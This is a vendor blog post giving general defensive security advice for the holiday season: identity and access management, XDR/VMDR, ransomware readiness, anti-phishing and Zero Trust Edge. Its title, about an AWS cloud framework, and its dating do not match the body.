e360 Blog

Moving to the Cloud with the AWS Well-Architected Framework

Written by Kevin Kohn | Dec 21, 2022 2:19:00 PM

At the end of another action-packed year, cyber professionals set their sights on what is coming over the horizon. 2021 ended with a “bang” and many cybersecurity teams worked well into the wee hours of the new year combating the Log4J vulnerability. Many are still fighting to secure their environments. Why do vulnerabilities tend to surface increasingly around the holiday season? It has a lot to do with vacations and organizations having a skeleton crew starting around Thanksgiving. Given this trend, what can organizations do to prepare for the next incursion and perhaps this time have an uneventful holiday season in 2022? I see 5 tactics – some new and some age-old basic security principles—that in combination establish a strong organizational security posture not just for the holiday season, but for the entire year.

Identity and Access Management

A significant number of breaches involve either stolen credentials or abuse of privileges. A strong identity and access management program needs to leverage multi-factor authentication (MFA), privileged access management (PAM), and certificate management (CM) to reduce cyber risk. The keys to mitigating identity attacks are ensuring someone is who they say they are and that the device they are coming from is who it says it is. Leveraging proper identity management in all aspects of cybersecurity should be the foundation you build the rest of your program on.

XDR/VMDR

As much as we would all like, organizations cannot prevent every compromise. Extended Detection and Response (XDR) tools can help address compromises before they spread. Combining vulnerability management with detection and response is an emerging capability known as VMDR. Imagine being able to detect a behavior or compromise and patch it in real time as opposed to waiting for the weekly or monthly scans, review a report, and then decide to act. The legacy ways of addressing vulnerabilities are too slow.

Ransomware Readiness

Ransomware? Are we still doing this? The answer is, yes and increasingly. Ransomware is alive, well, and spreading quickly. Organizations continue to be vulnerable to ransomware. To help combat the potential impact of compromise, a ransomware readiness assessment that includes a live fire exercise with a breach attack simulator is recommended to help identify attack vectors and remediate detected issues. A ransomware readiness assessment also allows an organization to test their ransomware response ‘playbook’ making sure that their roles, responsibilities, communications, and processes are set up to effectively respond to a real-world attack.

Anti-Phishing

Email is still the most targeted attack vector organizations need to defend. Phishing attacks remain a constant threat and are among the top entry points for ransomware and credential harvesting. Organizations should implement strong anti-phishing protections including tools and awareness training. Also consider leveraging web and email isolation to prevent malware from infecting your organization.

Zero Trust Edge

Also known as Secure Access Service Edge (SASE), Zero Trust Edge (ZTE) is “where the industry is going”. With increased adoption of SaaS services as well as cloud computing overall, it makes sense to have a centralized policy decision and enforcement point in the cloud. Imagine having DNS security, cloud firewall capabilities, Data Loss Prevention (DLP), Software Defined WAN, secure web gateway, and an SSL VPN in a single console? With the right ZTE provider, organizations can also leverage the same capabilities and still access legacy on prem applications and data with the same protection from the cloud.

Defending against attacks and reducing overall cyber risk requires a multilayered approach. We have all been searching for the “silver bullet” of cybersecurity, but one bullet won’t do the job. We need an entire arsenal of tools, processes, and people to combat what is coming. The best chance we have at a less eventful 2022 is to adopt strong identity and access management practices and pair them with zero trust edge. Our endpoints should have XDR capabilities and we need to be hunting ransomware before it happens. Phishing can and should be reduced to a minimal risk category combined with the right tools and processes focused on isolation and reputation. By embracing the five ideas above, you increase your chances of a peaceful and happy new year.